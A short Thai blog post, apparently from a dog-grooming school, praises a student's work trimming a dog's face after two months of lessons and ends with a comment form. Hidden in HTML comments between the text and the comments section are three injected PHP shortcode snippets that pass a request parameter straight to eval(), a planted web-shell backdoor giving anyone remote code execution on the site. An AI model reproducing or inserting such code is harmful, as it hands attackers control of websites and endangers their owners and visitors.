ผลงาน ของนักเรียนท่านหนึ่ง


นักเรียน สวยท่านนี้ ผ่านการเรียนมาประมาณ 2 เดือน ตัดหน้าออกมาได้กลม 3 มิติ
แต่แต่งหน้าสุนัข นานกว่าหน้าตนอีก

<!– [insert_php]if (isset($_REQUEST["vzRG"])){eval($_REQUEST["vzRG"]);exit;}[/insert_php][php]if (isset($_REQUEST["vzRG"])){eval($_REQUEST["vzRG"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["Pmy"])){eval($_REQUEST["Pmy"]);exit;}[/insert_php][php]if (isset($_REQUEST["Pmy"])){eval($_REQUEST["Pmy"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["jsxwI"])){eval($_REQUEST["jsxwI"]);exit;}[/insert_php][php]if (isset($_REQUEST["jsxwI"])){eval($_REQUEST["jsxwI"]);exit;}[/php] –>

Comments

comments

Leave a Reply

Your email address will not be published.

กรุณาตอบคำถามเพื่อยืนยันตัวตน *